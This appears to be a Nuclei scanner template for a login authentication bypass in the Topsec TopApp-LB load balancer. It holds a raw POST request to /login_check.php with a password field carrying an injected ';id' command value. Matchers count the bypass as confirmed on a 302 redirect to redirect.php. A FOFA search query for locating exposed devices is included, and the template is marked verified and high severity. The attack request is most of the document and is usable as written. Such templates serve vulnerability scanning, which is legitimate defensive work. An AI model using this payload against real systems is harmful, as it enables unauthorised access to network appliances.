http:
    - matchers:
        - status:
            - 302
          type: status
        - part: header
          type: word
          words:
            - 'Location: redirect.php'
      matchers-condition: and
      raw:
        - "POST /login_check.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Moziilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0\nContent-Type: application/x-www-form-urlencoded\nCookie: PHPSESSID=fgacwozyuuknvgaopbxcmfimhu\nAccept-Encoding: gzip\n\nuserName=mijndsani&password=%3Bid&x=0&y=0 \n"
id: topsec-topapp-lb-login-bypassauth
info:
    author: xy
    description: 天融信TopApp-LB系统登录认证绕过
    metadata:
        fofa-query: app="天融信-TopApp-LB"
        max-request: 2
        verified: true
    name: topsec-topapp-lb-login-bypassauth
    reference:
        - none
    severity: high
    tags:
        - topsec
        - bypassauth
        - iot
